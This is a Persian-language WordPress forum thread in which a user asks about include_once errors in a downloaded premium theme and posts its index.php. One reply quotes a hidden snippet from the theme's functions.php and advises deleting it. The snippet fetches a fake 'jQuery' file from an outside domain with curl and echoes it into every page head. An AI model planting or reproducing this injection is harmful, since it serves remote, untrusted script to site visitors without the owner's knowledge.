mohammad533

دو مشکل خیلی جدی در پوسته مجله ای فارسی آر اس

11 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

سلام میشه بگین این ارور هارو چه جوری برطرف کنم

هم رو وردپرس 5.2

و هم رو 4.2

امتحانش کردم

اینم رور ها

Warning: include_once(C:\wamp\www\wordpress/wp-content/themes/ares/templates/template-blog-.php) [function.include-once]: failed to open stream: No such file or directory in C:\wamp\www\wordpress\wp-content\themes\ares\index.php on line 72

Warning: include_once() [function.include]: Failed opening ‘C:\wamp\www\wordpress/wp-content/themes/ares/templates/template-blog-.php’ for inclusion (include_path=’.;C:\php5\pear’) in C:\wamp\www\wordpress\wp-content\themes\ares\index.php on line 72

اینم لینک قالب

ویرایش شده در توسط mohammad533
0

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

سلام

پس از نصب ابتدا به فایل function.php برین و این خطوط رو پاک کنین (قبلش حتما بک آپ بگیرین)

**/if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} 

در ضمن از آخرین نسخه ورد پرس استفاده کنید

ویرایش شده در توسط mahdihunter
0

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

سلام

بازم نشد!!!

ویرایش شده در توسط mohammad533
0

به اشتراک گذاری این پست


لینک به پست

سلام

بازم نشد!!!

برای استفاده از لوکال هاست از XAMPP استفاده کنید احتمالا مشکلتون حل بشه

قالب رو رو لوکال و همچنین هاستم تست کردم مشکلی نداشت

0

به اشتراک گذاری این پست


لینک به پست

دوست من خوب سایت را خوانده اید؟


این نسخه روی وردپرس 3.5 دارای ی سری اشکالات هست

بعد هم فکر کنم قالب پولی است.برای همین چون حقوق نویسنده را زیر پای می گذارد ، پشتیبانی هم نمی شود.

1

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

من رو وردپرس 4.2 رو هم امتحان کردم نشد؟؟؟

مشکلش هم فکر کنم توی این خطه

include_once (TEMPLATEPATH . "/bashgahegraphic".$pp_blog_layout.".php");

این رور ها مال فایل index.php است این فایلش کاملش

<?php
<?php
/**
* The main template file.
*
* @package WordPress
*/

get_header();

$pp_slider_timer = get_option('pp_slider_timer');
if(empty($pp_slider_timer))
{
$pp_slider_timer = 5;
}

// Get featured posts
$pp_featured_cat = get_option('pp_featured_cat');
$pp_home_display_slide = TRUE;
$featured_posts_arr = array();

if(isset($_SESSION['pp_menu_style']))
{
$pp_menu_style = $_SESSION['pp_menu_style'];
}
else
{
$pp_menu_style = get_option('pp_menu_style');
}

?>

<input type="hidden" id="slider_timer" name="slider_timer" value="<?php echo $pp_slider_timer; ?>"/>

<br class="clear"/>

<div id="content_wrapper">

<div class="inner">

<!-- Begin main content -->
<div class="inner_wrapper">

<?php
if($pp_menu_style != 4 && $pp_menu_style != 5 && $pp_menu_style != 6)
{
include_once (TEMPLATEPATH . "/templates/template-slide-1.php");
}
else
{
include_once (TEMPLATEPATH . "/templates/template-slide-2.php");
?>

<div class="sidebar_content">

<?php
}
?>

<?php

global $more; $more = false; # some wordpress wtf logic

if(isset($_SESSION['pp_blog_layout']))
{
$pp_blog_layout = $_SESSION['pp_blog_layout'];
}
else
{
$pp_blog_layout = get_option('pp_blog_layout');
}

include_once (TEMPLATEPATH . "/bashgahegraphic".$pp_blog_layout.".php");

if($pp_menu_style == 4 OR $pp_menu_style == 5 OR $pp_menu_style == 6)
{
?>
</div>
<?php
}
else
{
?>
</div>
</div>
<?php
}
?>

<div class="sidebar_wrapper">
<?php
$twitter_id = get_option(SHORTNAME.'_twitter_username');
$fb_id = get_option('pp_feedburner_id');

if(!empty($twitter_id) OR !empty($fb_id)):
?>
<div class="social_profile">
<div class="profile">
<a href="<?php echo $fb_id; ?>">
<img src="<?php echo get_stylesheet_directory_uri(); ?>/images/social_feeds.png" alt="" class="alignleft social"/>
</a>
<h4><?php pp_feeds_count(); ?></h4>
<span class="count">subscribers</span>
</div>

<div class="profile">
<a href="http://twitter.com/<?php echo $twitter_id; ?>">
<img src="<?php echo get_stylesheet_directory_uri(); ?>/images/social_twitter.png" alt="" class="alignleft social"/>
</a>
<h4><?php pp_twitter_followers(); ?></h4>
<span class="count">followers</span>
</div>

<br class="clear"/>
</div>
<?php
endif;
?>

<div class="ads125_wrapper">
<?php
$pp_side_banner = get_option('pp_side_banner');

if(!empty($pp_side_banner))
{
echo stripslashes($pp_side_banner);
}
?>
</div>

<div class="sidebar">

<div class="content">

<ul class="sidebar_widget">
<?php dynamic_sidebar('Home Sidebar'); ?>
</ul>

</div>

</div>
<br class="clear"/>

</div>

<br class="clear"/>
</div>
<!-- End main content -->

</div>

</div>

<?php get_footer(); ?>
<?php get_footer(); ?>

ویرایش شده در توسط mohammad533
0

به اشتراک گذاری این پست


لینک به پست

دوست من خوب سایت را خوانده اید؟


این نسخه روی وردپرس 3.5 دارای ی سری اشکالات هست

بعد هم فکر کنم قالب پولی است.برای همین چون حقوق نویسنده را زیر پای می گذارد ، پشتیبانی هم نمی شود.

پوسته پرمیوم هست؟
1

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

بله

ویرایش شده در توسط mohammad533
0

به اشتراک گذاری این پست


لینک به پست

بله

بحث در مورد قالبهای غیر رایگان ممنوع است قوانین را بخوانید

0

به اشتراک گذاری این پست


لینک به پست

اما این قالب رایگانه به صورت رایگان دانلود شده لینک دانلود رایگان بالا هستش!!!!!!

0

به اشتراک گذاری این پست


لینک به پست

پوسته پرمیوم هست؟

بله

در هر حال مراحل نصبش را درست اجرا کنید قالب مشکلی ندارد

1

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط iranibonsai
      درود، سایتی رو با وردپرس بالا آوردیم
      اما اکنون در صفحات داخلی سایت کد خطایی رو در بخش بالای مرورگر نشون میده که نتونستیم رفعش کنیم
      Warning: count(): Parameter must be an array or an object that implements Countable in /home3/zahrefzo/public_html/wp-includes/post-template.php on line 284
      این خطا قبلا وجود نداشت، نفهمیدم به چه علتی بوجود آمده و تو اینترنت هم چیز خاصی راجعبه رفعش پیدا نکردم، ممنون میشم اعلام نظر بفرمایید
      آدرس سایت :
      http://minelbeautysalon.com//
    • توسط majid_one

      من به  تازگی سایتی راه اندازی کردم و از این که ابزار ها و افزونه هایی که در اینترنت به فروش میرسن استایلشون با قالب من جور در نمیان و یا نمیتونم سفارشیشون کنم برای خودم

      میخواستم بپرسم این ابزار ها با چه کدی نوشته شدن و آیا میشه همه جوره توشون دست برد و برای خودت سفارشیشون کرد و استایلشون رو شبیه استایل قالب وبسایت خودت کنی؟
    • توسط ashkan91
      با سلام و خسته نباشید
      دوستان کسی میدونه چطور میشه فیلد ایمیل رو از تو فرم تسویه حساب ووکامرس غیرضروری کرد؟ (بدون استفاده از افزونه) یکی از دوستان این لینک رو فرستادن اما نمیدونم کدام تکه کد از این صفحه را میبایست درون کدهای سایت قرار بدم که مشکل حل بشه؟
      https://docs.woocommerce.com/document/tutorial-customising-checkout-fields-using-actions-and-filters/#example-make-phone-number-not-required
    • توسط amirmehdi950
      سلام روزتون بخیر
      من میخوام از افزونه ultimate member private message استفاده کنم اما یه چیزی کم داره.
      میخوام دکمه پیوست هم داشته باشه.
      (این افزونه همونطوری که از اسمش پیداست برای ارسال پیام خصوصی بین کاربرا ساخته شده، افزونه private message به تنهایی کار نمیکنه و باید ultimate member هم نصب باشه که افزونه بسیار خوبیه.)
      حالا من سوالی که دارم اینه که چطوری میشه این دکمه رو هم به قسمت چت اضافه کرد و از کجا باید کدهاشو ویرایش کرد
      این هم تصویر افزونه ( محل جایگذاریش میخوام کنار بخش emoji باشه)
       

      ممنونم
    • توسط mohamad7072
      سلام دوستان خسته نباشید 
      من میخوام ظاهر سایتم رو عوض کنم مثلا صفحه اول سایتم رو تغییر دادم اما این تغییرات اعمال نمیشه یا مثلا یه افزونه رو کامل پاک کردم ولی هنوز اثراتش هست 
      همه این مشکلات وقتی هست که به عنوان کاربر مهمان وارد سایت میشم ولی وقتی لاگین میکنم همه چی درست میشه...
      مشکل از چیه کسی میتونه کمکم کنه؟؟